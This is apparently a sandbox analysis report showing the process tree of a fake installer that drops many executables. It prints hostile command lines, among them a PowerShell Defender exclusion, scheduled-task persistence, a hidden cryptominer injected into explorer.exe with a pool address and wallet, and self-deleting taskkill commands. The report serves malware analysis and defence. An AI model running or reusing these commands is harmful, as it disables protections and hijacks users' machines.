memory of 360 1864 setup_install.exe 31 PID 1864 wrote to memory of 360 1864 setup_install.exe 31 PID 1864 wrote to memory of 360 1864 setup_install.exe 31 PID 1864 wrote to memory of 360 1864 setup_install.exe 31 PID 1864 wrote to memory of 360 1864 setup_install.exe 31 PID 1864 wrote to memory of 108 1864 setup_install.exe 30 PID 1864 wrote to memory of 108 1864 setup_install.exe 30 PID 1864 wrote to memory of 108 1864 setup_install.exe 30 PID 1864 wrote to memory of 108 1864 setup_install.exe 30 PID 1864 wrote to memory of 108 1864 setup_install.exe 30 PID 1864 wrote to memory of 108 1864 setup_install.exe 30 PID 1864 wrote to memory of 108 1864 setup_install.exe 30 PID 1864 wrote to memory of 1472 1864 setup_install.exe 35 PID 1864 wrote to memory of 1472 1864 setup_install.exe 35 PID 1864 wrote to memory of 1472 1864 setup_install.exe 35 PID 1864 wrote to memory of 1472 1864 setup_install.exe 35 PID 1864 wrote to memory of 1472 1864 setup_install.exe 35 PID 1864 wrote to memory of 1472 1864 setup_install.exe 35 PID 1864 wrote to memory of 1472 1864 setup_install.exe 35 PID 1864 wrote to memory of 1468 1864 setup_install.exe 34 PID 1864 wrote to memory of 1468 1864 setup_install.exe 34 PID 1864 wrote to memory of 1468 1864 setup_install.exe 34 PID 1864 wrote to memory of 1468 1864 setup_install.exe 34 PID 1864 wrote to memory of 1468 1864 setup_install.exe 34 PID 1864 wrote to memory of 1468 1864 setup_install.exe 34 PID 1864 wrote to memory of 1468 1864 setup_install.exe 34 PID 360 wrote to memory of 764 360 cmd.exe 33 PID 360 wrote to memory of 764 360 cmd.exe 33 PID 360 wrote to memory of 764 360 cmd.exe 33 PID 360 wrote to memory of 764 360 cmd.exe 33 PID 360 wrote to memory of 764 360 cmd.exe 33 PID 360 wrote to memory of 764 360 cmd.exe 33 PID 360 wrote to memory of 764 360 cmd.exe 33 PID 1864 wrote to memory of 1156 1864 setup_install.exe 32 PID 1864 wrote to memory of 1156 1864 setup_install.exe 32 PID 1864 wrote to memory of 1156 1864 setup_install.exe 32 PID 1864 wrote to memory of 1156 1864 setup_install.exe 32 PID 1864 wrote to memory of 1156 1864 setup_install.exe 32 PID 1864 wrote to memory of 1156 1864 setup_install.exe 32 PID 1864 wrote to memory of 1156 1864 setup_install.exe 32 PID 1864 wrote to memory of 616 1864 setup_install.exe 43 PID 1864 wrote to memory of 616 1864 setup_install.exe 43 PID 1864 wrote to memory of 616 1864 setup_install.exe 43 PID 1864 wrote to memory of 616 1864 setup_install.exe 43 PID 1864 wrote to memory of 616 1864 setup_install.exe 43 PID 1864 wrote to memory of 616 1864 setup_install.exe 43 PID 1864 wrote to memory of 616 1864 setup_install.exe 43 PID 1864 wrote to memory of 1552 1864 setup_install.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Users\Admin\AppData\Local\Temp\7zS01522F12\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS01522F12\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵
- Loads dropped DLL
PID:108 -
C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:360 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵
- Loads dropped DLL
PID:1156 -
C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵
- Loads dropped DLL
PID:1468 -
C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun193fda712d9f1.exeSun193fda712d9f1.exe5⤵
- Executes dropped EXE
PID:1676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵
- Loads dropped DLL
PID:1472 -
C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1832 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2084
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵PID:1552
-
C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone5⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2252 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\59768322479.exe"6⤵PID:1840
-
C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\59768322479.exe"C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\59768322479.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\20868724921.exe" /mix6⤵PID:3116
-
C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\20868724921.exe"C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\20868724921.exe" /mix7⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3332 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\PhmFacly & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\20868724921.exe"8⤵PID:3524
-
C:\Windows\SysWOW64\timeout.exetimeout 49⤵
- Delays execution with timeout.exe
PID:3592
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\90465974774.exe" /mix6⤵PID:3252
-
C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\90465974774.exe"C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\90465974774.exe" /mix7⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3400 -
C:\Users\Admin\AppData\Roaming\sliders\apinesp.exeapinesp.exe8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"6⤵PID:3380
-
C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3532 -
C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun19de8ff4b6aefeb8.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun19de8ff4b6aefeb8.exe" & exit6⤵PID:3472
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun19de8ff4b6aefeb8.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵
- Loads dropped DLL
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1652 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 9726⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:968
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵
- Loads dropped DLL
PID:1428 -
C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1696 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1968 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2196 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:2380
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:2364
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:1380
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:1472
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
- Executes dropped EXE
PID:2652
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3108
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2288 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
PID:2472 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2336 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\16825021799.exe"8⤵PID:2064
-
C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\16825021799.exe"C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\16825021799.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\04350976466.exe" /mix8⤵PID:2576
-
C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\04350976466.exe"C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\04350976466.exe" /mix9⤵
- Executes dropped EXE
PID:2712
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\35378882040.exe" /mix8⤵PID:2764
-
C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\35378882040.exe"C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\35378882040.exe" /mix9⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2864 -
C:\Users\Admin\AppData\Roaming\sliders\apinesp.exeapinesp.exe10⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:2332
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2324
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2536 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2536 -s 14528⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2752 -
C:\Users\Admin\AppData\Local\Temp\is-UKH8E.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-UKH8E.tmp\setup_2.tmp" /SL5="$1019C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
PID:2868 -
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
PID:2976 -
C:\Users\Admin\AppData\Local\Temp\is-3S423.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-3S423.tmp\setup_2.tmp" /SL5="$201B2,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:3036
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2800 -
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:2888
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:2844
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2900
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
- Loads dropped DLL
PID:616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵
- Loads dropped DLL
PID:1192 -
C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun1905815e51282417.exeSun1905815e51282417.exe5⤵
- Executes dropped EXE
PID:1016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵
- Loads dropped DLL
PID:1376 -
C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵
- Loads dropped DLL
PID:1540 -
C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\is-EAAH0.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-EAAH0.tmp\Sun1966fb31dd5a07.tmp" /SL5="$D0160,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun1966fb31dd5a07.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1264 -
C:\Users\Admin\AppData\Local\Temp\is-CRDP1.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-CRDP1.tmp\Ze2ro.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
PID:2456 -
C:\Program Files\7-Zip\LOSLACVOIH\ultramediaburner.exe"C:\Program Files\7-Zip\LOSLACVOIH\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
PID:2208 -
C:\Users\Admin\AppData\Local\Temp\is-7AIRU.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-7AIRU.tmp\ultramediaburner.tmp" /SL5="$20330,281924,62464,C:\Program Files\7-Zip\LOSLACVOIH\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2308 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
PID:2144
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\e4-dd61b-d50-794a3-54712ee69f005\Cepesaetozhi.exe"C:\Users\Admin\AppData\Local\Temp\e4-dd61b-d50-794a3-54712ee69f005\Cepesaetozhi.exe"8⤵
- Executes dropped EXE
PID:2576 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4060 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4060 CREDAT:275457 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3252
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4060 CREDAT:3552265 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2184
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4060 CREDAT:1913873 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2128
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1980 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1980 CREDAT:275457 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2256
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514839⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3200 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3200 CREDAT:275457 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3048
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515139⤵PID:3812
-
-
-
C:\Users\Admin\AppData\Local\Temp\a8-33e47-fc8-ab3a2-aa67b63ce97bd\SHelylaewesy.exe"C:\Users\Admin\AppData\Local\Temp\a8-33e47-fc8-ab3a2-aa67b63ce97bd\SHelylaewesy.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2220 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q1k2lmot.ifs\GcleanerEU.exe /eufive & exit9⤵PID:2988
-
C:\Users\Admin\AppData\Local\Temp\q1k2lmot.ifs\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\q1k2lmot.ifs\GcleanerEU.exe /eufive10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1308 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\q1k2lmot.ifs\GcleanerEU.exe" & exit11⤵PID:3384
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3244
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ueetfdm4.u0a\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:3500
-
C:\Users\Admin\AppData\Local\Temp\ueetfdm4.u0a\installer.exeC:\Users\Admin\AppData\Local\Temp\ueetfdm4.u0a\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Enumerates connected drives
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
PID:3100 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ueetfdm4.u0a\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ueetfdm4.u0a\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632314385 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:3884
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yh4m3mu0.bsx\anyname.exe & exit9⤵PID:956
-
C:\Users\Admin\AppData\Local\Temp\yh4m3mu0.bsx\anyname.exeC:\Users\Admin\AppData\Local\Temp\yh4m3mu0.bsx\anyname.exe10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xlihfugf.pxe\gcleaner.exe /mixfive & exit9⤵PID:4040
-
C:\Users\Admin\AppData\Local\Temp\xlihfugf.pxe\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\xlihfugf.pxe\gcleaner.exe /mixfive10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2344 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\xlihfugf.pxe\gcleaner.exe" & exit11⤵PID:3812
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0k2vsvwb.0ar\autosubplayer.exe /S & exit9⤵PID:3016
-
C:\Users\Admin\AppData\Local\Temp\0k2vsvwb.0ar\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\0k2vsvwb.0ar\autosubplayer.exe /S10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3180 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn7E93.tmp\tempfile.ps1"11⤵
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn7E93.tmp\tempfile.ps1"11⤵PID:1884
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn7E93.tmp\tempfile.ps1"11⤵PID:2156
-
-
